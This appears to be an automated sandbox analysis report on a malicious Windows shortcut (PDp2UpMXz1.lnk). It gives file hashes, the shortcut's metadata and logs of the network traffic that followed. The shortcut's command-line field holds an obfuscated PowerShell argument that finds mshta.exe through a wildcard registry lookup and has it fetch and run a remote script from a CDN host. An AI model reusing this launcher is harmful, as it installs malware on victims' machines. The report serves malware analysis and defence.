                      MD5:7EB260859AB0192CC38348CA805372C0
                      SHA1:57CC83A36EBE6FD660AB6D513D6BCAA689CA77A4
                      SHA-256:EDC81818851D1A7F30F896CEB6352389D3DFF1A57599BE7B5AFF31D70155ABBD
                      SHA-512:A0FCB6D8853AD16D06EB860BAD45E83AE1E0B4465FDA3A0830CF5C4BE78D93D1131F750C2806E0192943B9183D242D1B7474DCA8B0074D517B64D388F510354F
                      Malicious:false
                      Preview:<?xml version="1.0" encoding="UTF-8"?>..<svg width="2880px" height="1424px" viewBox="0 0 2880 1424" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. Generator: Sketch 52.5 (67469) - http://www.bohemiancoding.com/sketch -->.. <title>Group 34</title>.. <desc>Created with Sketch.</desc>.. <defs>.. <radialGradient cx="48.4540422%" cy="27.0119645%" fx="48.4540422%" fy="27.0119645%" r="70.8708514%" gradientTransform="translate(0.484540,0.270120),scale(0.494444,1.000000),rotate(90.000000),translate(-0.484540,-0.270120)" id="radialGradient-1">.. <stop stop-color="#002649" offset="0%"></stop>.. <stop stop-color="#051F37" offset="100%"></stop>.. </radialGradient>.. <rect id="path-2" x="0" y="0" width="2880" height="1424"></rect>.. </defs>.. <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">.. <g id="Homepage-Copy" transform="translate(0.000000, -5295.
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):64
                      Entropy (8bit):1.1940658735648508
                      Encrypted:false
                      SSDEEP:3:Nlllulbnolz:NllUc
                      MD5:F23953D4A58E404FCB67ADD0C45EB27A
                      SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                      SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                      SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                      Malicious:false
                      Preview:@...e................................................@..........
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:ASCII text, with no line terminators
                      Category:dropped
                      Size (bytes):60
                      Entropy (8bit):4.038920595031593
                      Encrypted:false
                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                      Malicious:false
                      Preview:# PowerShell test file to determine AppLocker lockdown mode
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.7711247194594875
                      Encrypted:false
                      SSDEEP:48:KEAiPRoHRQTS0qYxXlHJRxSogZoPwwUqYxXlLRxSogZoPwk1:GSRyyTP3xXNgHR3xX3gHa
                      MD5:6F1910AFC03724EBE6AA95298AA11DA5
                      SHA1:026B63C9F251A146E60DC9D0CAA21301AD518F74
                      SHA-256:3F3A5627657736C957F2647DCB132F02D8925D36B84C8EEB349DAA9E0F1DD879
                      SHA-512:64B5204B024D6DCCAEAF20BD2D79D148B343088BED8D6A18347767540B425A428D016ED1ED0238F38D4588A828F921125B01C0CCB06029569B4DC02002582D84
                      Malicious:false
                      Preview:...................................FL..................F. .. .....c.W....!.M.....x.L........s........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....!.W.....M......j.2.....1Y.4 .PDP2UP~1.LNK..N......EW.51Y.4..........................n.0.P.D.p.2.U.p.M.X.z.1...l.n.k.......W...............-.......V...........,qJ......C:\Users\user\Desktop\PDp2UpMXz1.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......610930...........hT..CrF.f4... .i...Jc...-...-$..hT..CrF.f4... .i...Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH1Y.4....3.......................b.W.i.n.d.o.w.s.....Z.1.....1Y.3..System32..B......OwH1Y.3............................8.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      File Type:data
                      Category:dropped
                      Size (bytes):4511
                      Entropy (8bit):3.7711247194594875
                      Encrypted:false
                      SSDEEP:48:KEAiPRoHRQTS0qYxXlHJRxSogZoPwwUqYxXlLRxSogZoPwk1:GSRyyTP3xXNgHR3xX3gHa
                      MD5:6F1910AFC03724EBE6AA95298AA11DA5
                      SHA1:026B63C9F251A146E60DC9D0CAA21301AD518F74
                      SHA-256:3F3A5627657736C957F2647DCB132F02D8925D36B84C8EEB349DAA9E0F1DD879
                      SHA-512:64B5204B024D6DCCAEAF20BD2D79D148B343088BED8D6A18347767540B425A428D016ED1ED0238F38D4588A828F921125B01C0CCB06029569B4DC02002582D84
                      Malicious:false
                      Preview:...................................FL..................F. .. .....c.W....!.M.....x.L........s........................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........S.....!.W.....M......j.2.....1Y.4 .PDP2UP~1.LNK..N......EW.51Y.4..........................n.0.P.D.p.2.U.p.M.X.z.1...l.n.k.......W...............-.......V...........,qJ......C:\Users\user\Desktop\PDp2UpMXz1.lnk....s.h.e.l.l.3.2...d.l.l.`.......X.......610930...........hT..CrF.f4... .i...Jc...-...-$..hT..CrF.f4... .i...Jc...-...-$.........Y...1SPS.....Oh.....+'..=................R.u.n. .a.s. .A.d.m.i.n.i.s.t.r.a.t.o.r.........9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?...............................FL..................F.".. ...o1.Z....s...W....."KW....@...........................P.O. .:i.....+00.../C:\...................V.1.....EW.5..Windows.@......OwH1Y.4....3.......................b.W.i.n.d.o.w.s.....Z.1.....1Y.3..System32..B......OwH1Y.3............................8.S.y.s.t.e.m.3.2.....t.1......O.I..Wi
                      Process:C:\Windows\System32\svchost.exe
                      File Type:JSON data
                      Category:dropped
                      Size (bytes):55
                      Entropy (8bit):4.306461250274409
                      Encrypted:false
                      SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                      MD5:DCA83F08D448911A14C22EBCACC5AD57
                      SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                      SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                      SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                      Malicious:false
                      Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                      File type:MS Windows shortcut, Item id list present, Has Description string, Has Relative path, Has command line arguments, Icon number=115, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hidenormalshowminimized
                      Entropy (8bit):3.3820338100657295
                      TrID:
                      • Windows Shortcut (20020/1) 100.00%
                      File name:PDp2UpMXz1.lnk
                      File size:1'182 bytes
                      MD5:97e64a53ff0f88feb9e4d3111ca7ad0e
                      SHA1:fb9943861883ae789f0d23324a191d1f94502719
                      SHA256:e22768aaf1e2f82438f62a41da5e664e127e492d93cb33f9a11e19f01c747333
                      SHA512:5481e5b431ba63df92cc3b82aa5780326ee82ba363fdd12309bd687db4d39b9e28df5d29c85da247026304892c5dcbc00ffac8abed76eaa5df60838721755812
                      SSDEEP:12:8MJUm/3BVSXvk44X3ojsqzKtnWNmKekSW+UcCsvXarDsIOkgXHzDiN37+lbYqlrx:8C/BHYVKVWAN6+/CWqrDAHzarab/
                      TLSH:612108141EE61B14E7B7CB79ACBAB321893A7C49ED528F9D015092882835211F8B4F2B
                      File Content Preview:L..................F....................................s........................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                      Icon Hash:e0f8ecdcdcf9eded

                      General

                      Relative Path:..\..\..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Command Line Argument:.(gp -pa 'HKLM:\SOF*\Clas*\Applications\msh*e').('PSChildName')https://fatodex.b-cdn.net/fatodex
                      Icon location:shell32.dll
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 17, 2024 08:32:04.625824928 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:04.625870943 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:04.625932932 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:04.638670921 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:04.638689995 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.378729105 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.378901958 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.424618959 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.424638987 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.425057888 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.425157070 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.426956892 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.467447996 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.645880938 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.645960093 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.645999908 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.646023035 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.648603916 CEST49711443192.168.2.6138.199.37.232
                      Sep 17, 2024 08:32:05.648626089 CEST44349711138.199.37.232192.168.2.6
                      Sep 17, 2024 08:32:05.663497925 CEST4971280192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:05.665930033 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:05.665967941 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:05.666044950 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:05.666265011 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:05.666282892 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:05.668160915 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:05.668193102 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:05.668318033 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:05.668385983 CEST8049712169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:05.668457985 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:05.668457985 CEST4971280192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:05.668467999 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:05.668560028 CEST4971280192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:05.673321962 CEST8049712169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.153386116 CEST8049712169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.153475046 CEST4971280192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.241604090 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.241637945 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.241719961 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.242028952 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.242046118 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.401374102 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.401484966 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.404889107 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:06.404959917 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:06.405908108 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.405922890 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.406300068 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.406362057 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.413855076 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.413919926 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:06.413949013 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:06.414279938 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:06.414331913 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:06.414664984 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:06.455403090 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.459403038 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:06.680179119 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.680264950 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.680417061 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.681225061 CEST49713443192.168.2.6169.150.247.37
                      Sep 17, 2024 08:32:06.681247950 CEST44349713169.150.247.37192.168.2.6
                      Sep 17, 2024 08:32:06.858812094 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.858896017 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.862215996 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.862226963 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.862626076 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.862692118 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.863003016 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.903400898 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.988168955 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.988230944 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.988246918 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.988331079 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.993793964 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.993818045 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.993855953 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.993899107 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.993923903 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.993943930 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.993963957 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.994019985 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:06.994074106 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.994119883 CEST49716443192.168.2.6169.150.236.104
                      Sep 17, 2024 08:32:06.994138002 CEST44349716169.150.236.104192.168.2.6
                      Sep 17, 2024 08:32:07.179725885 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.179753065 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:07.179819107 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.180048943 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.180061102 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:07.910193920 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:07.910267115 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.913535118 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.913544893 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:07.913892031 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:07.913942099 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.914305925 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:07.955404043 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:08.196476936 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:08.196507931 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:08.196537018 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:08.196551085 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:08.196563959 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:08.196620941 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:08.198312998 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:08.198357105 CEST44349717169.150.247.39192.168.2.6
                      Sep 17, 2024 08:32:08.198405981 CEST49717443192.168.2.6169.150.247.39
                      Sep 17, 2024 08:32:21.945934057 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:21.945997000 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:21.946031094 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946053982 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:21.946069002 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946118116 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946124077 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:21.946157932 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:32:21.946170092 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946203947 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946676016 CEST49714443192.168.2.6169.150.247.38
                      Sep 17, 2024 08:32:21.946692944 CEST44349714169.150.247.38192.168.2.6
                      Sep 17, 2024 08:33:54.574059010 CEST4971280192.168.2.6169.150.236.104
                      Sep 17, 2024 08:33:54.579330921 CEST8049712169.150.236.104192.168.2.6
                      Sep 17, 2024 08:33:54.579400063 CEST4971280192.168.2.6169.150.236.104
                      TimestampSource PortDest PortSource IPDest IP
                      Sep 17, 2024 08:32:04.610320091 CEST5636453192.168.2.61.1.1.1
                      Sep 17, 2024 08:32:04.619640112 CEST53563641.1.1.1192.168.2.6
                      Sep 17, 2024 08:32:05.655181885 CEST5403253192.168.2.61.1.1.1
                      Sep 17, 2024 08:32:05.656749964 CEST5206453192.168.2.61.1.1.1
                      Sep 17, 2024 08:32:05.658922911 CEST5191753192.168.2.61.1.1.1
                      Sep 17, 2024 08:32:05.662791014 CEST53540321.1.1.1192.168.2.6
                      Sep 17, 2024 08:32:05.665440083 CEST53520641.1.1.1192.168.2.6
                      Sep 17, 2024 08:32:05.667628050 CEST53519171.1.1.1192.168.2.6
                      Sep 17, 2024 08:32:07.168488979 CEST6461853192.168.2.61.1.1.1
                      Sep 17, 2024 08:32:07.178941011 CEST53646181.1.1.1192.168.2.6
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Sep 17, 2024 08:32:04.610320091 CEST192.168.2.61.1.1.10xc57eStandard query (0)fatodex.b-cdn.netA (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.655181885 CEST192.168.2.61.1.1.10xe5e3Standard query (0)fonts.bunny.netA (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.656749964 CEST192.168.2.61.1.1.10x5efdStandard query (0)bunnycdn.b-cdn.netA (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.658922911 CEST192.168.2.61.1.1.10xb74eStandard query (0)bunny.netA (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:07.168488979 CEST192.168.2.61.1.1.10x9d94Standard query (0)bunnycdn.comA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Sep 17, 2024 08:32:04.619640112 CEST1.1.1.1192.168.2.60xc57eNo error (0)fatodex.b-cdn.net138.199.37.232A (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.662791014 CEST1.1.1.1192.168.2.60xe5e3No error (0)fonts.bunny.netbunnyfonts.b-cdn.netCNAME (Canonical name)IN (0x0001)false
                      Sep 17, 2024 08:32:05.662791014 CEST1.1.1.1192.168.2.60xe5e3No error (0)bunnyfonts.b-cdn.net169.150.236.104A (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.665440083 CEST1.1.1.1192.168.2.60x5efdNo error (0)bunnycdn.b-cdn.net169.150.247.37A (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:05.667628050 CEST1.1.1.1192.168.2.60xb74eNo error (0)bunny.net169.150.247.38A (IP address)IN (0x0001)false
                      Sep 17, 2024 08:32:07.178941011 CEST1.1.1.1192.168.2.60x9d94No error (0)bunnycdn.com169.150.247.39A (IP address)IN (0x0001)false
                      • fatodex.b-cdn.net
                      • https:
                        • bunnycdn.b-cdn.net
                        • bunny.net
                        • bunnycdn.com
                      • fonts.bunny.net
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649712169.150.236.104807156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      Sep 17, 2024 08:32:05.668560028 CEST355OUTGET /css?family=Rubik:300,400,500,700,900 HTTP/1.1
                      Accept: */*
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: fonts.bunny.net
                      Connection: Keep-Alive
                      Sep 17, 2024 08:32:06.153386116 CEST875INHTTP/1.1 301 Moved Permanently
                      Date: Tue, 17 Sep 2024 06:32:06 GMT
                      Content-Type: text/html
                      Content-Length: 162
                      Connection: keep-alive
                      Server: BunnyCDN-IL1-1206
                      CDN-PullZone: 781720
                      CDN-Uid: 3a60ca70-b89d-4cd5-a4b5-34a3468d7e0f
                      CDN-RequestCountryCode: US
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Location: https://fonts.bunny.net/css?family=Rubik:300,400,500,700,900
                      CDN-RequestId: d0068135d82d50a8d203c428f13667ce
                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649711138.199.37.2324437156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2024-09-17 06:32:05 UTC328OUTGET /fatodex HTTP/1.1
                      Accept: */*
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: fatodex.b-cdn.net
                      Connection: Keep-Alive
                      2024-09-17 06:32:05 UTC233INHTTP/1.1 403 Forbidden
                      Date: Tue, 17 Sep 2024 06:32:05 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Vary: Accept-Encoding
                      Server: BunnyCDN-DE1-874
                      CDN-RequestId: b7e9c01fd5af3d23c99639a5a9976cf0
                      2024-09-17 06:32:05 UTC724INData Raw: 32 63 38 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 75 62 69 6b 3a 33 30 30 2c 34 30 30 2c 35 30 30 2c 37 30 30 2c 39 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 62 75 6e 6e 79 63 64 6e 2e 62 2d 63 64 6e 2e 6e 65 74 2f 61 73 73 65 74 73 2f 6c 61 6e 64 69 6e 67 70 61 67 65 2f 63 73 73 2f 75 6e 63 6f 6e 66 69 67 75 72 65 64 2e 63 73 73 22 3e 20 3c 74 69 74 6c 65 3e 42 75 6e 6e 79 43 44 4e 20 4e 6f 64 65 20 44 45 31 2d 38 37 34 3c 2f 74 69
                      Data Ascii: 2c8<html><head> <link href="http://fonts.bunny.net/css?family=Rubik:300,400,500,700,900" rel="stylesheet" type="text/css"> <link rel="stylesheet" href="https://bunnycdn.b-cdn.net/assets/landingpage/css/unconfigured.css"> <title>BunnyCDN Node DE1-874</ti


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.649713169.150.247.374437156C:\Windows\System32\mshta.exe
                      TimestampBytes transferredDirectionData
                      2024-09-17 06:32:06 UTC405OUTGET /assets/landingpage/css/unconfigured.css HTTP/1.1
                      Accept: */*
                      Referer: https://fatodex.b-cdn.net/fatodex
                      Accept-Language: en-CH
                      UA-CPU: AMD64
                      Accept-Encoding: gzip, deflate
                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                      Host: bunnycdn.b-cdn.net
                      Connection: Keep-Alive
                      2024-09-17 06:32:06 UTC956INHTTP/1.1 200 OK
                      Date: Tue, 17 Sep 2024 06:32:06 GMT
                      Content-Type: text/css
                      Content-Length: 1199
                      Connection: close
                      Vary: Accept-Encoding
                      Server: BunnyCDN-DE1-1080
                      CDN-PullZone: 390
                      CDN-Uid: 51eb4203-ff94-48c6-99a5-954f277b91de
                      CDN-RequestCountryCode: US
                      Access-Control-Allow-Origin: *
                      Access-Control-Allow-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Access-Control-Expose-Headers: Server, x-goog-meta-frames, Content-Length, Content-Type, Range, X-Requested-With, If-Modified-Since, If-None-Match
                      Cache-Control: public, max-age=2592000
                      ETag: "01cf3d6e3f9da1:0"
                      Last-Modified: Thu, 29 Aug 2024 07:19:52 GMT
                      Backend: 1
                      CDN-ProxyVer: 1.04
                      CDN-RequestPullSuccess: True
                      CDN-RequestPullCode: 200
                      CDN-CachedAt: 08/30/2024 05:07:32
